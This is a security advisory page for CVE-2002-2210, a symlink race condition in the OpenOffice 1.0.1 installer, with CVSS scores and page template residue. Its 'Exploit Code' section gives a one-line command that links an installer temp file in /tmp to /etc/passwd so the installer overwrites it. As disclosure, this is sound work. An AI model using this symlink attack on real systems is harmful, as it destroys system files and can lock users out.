OpenOffice 1.0.1 Race condition during installation

Risk: Medium
Local: Yes
Remote: No

CVSS Base Score: 6.2/10
Impact Subscore: 10/10
Exploitability Subscore: 1.9/10
Exploit range: Local
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Title: OpenOffice 1.0.1 Race condition during installation Author: Larry W. Cashdollar, @_larry0 Date: 2009-09-02 CVE-ID:[CVE-2002-2210] Download Site: Vendor: Open Office Vendor Notified: 2009-09-02 Vendor Contact: bugtraq Advisory: Description: The open office desktop suite. Vulnerability: A very simple and easy to exploit race condition exist during the installation of OpenOffice. During this window a malicous user could create a symlink in /tmp and overwrite arbitrary files. Export: JSON TEXT XML Exploit Code: As a normal user: lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf will result in the password file being over written with: # create the proper autoresponse file <file> cat << EOF > /tmp/${USER}autoresponse.conf [ENVIRONMENT] INSTALLATIONMODE=$installtype INSTALLATIONTYPE=STANDARD DESTINATIONPATH=$prefix/$oohome OUTERPATH= LOGFILE= LANGUAGELIST=<LANGUAGE> [JAVA] JavaSupport=preinstalled_or_none EOF </file>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top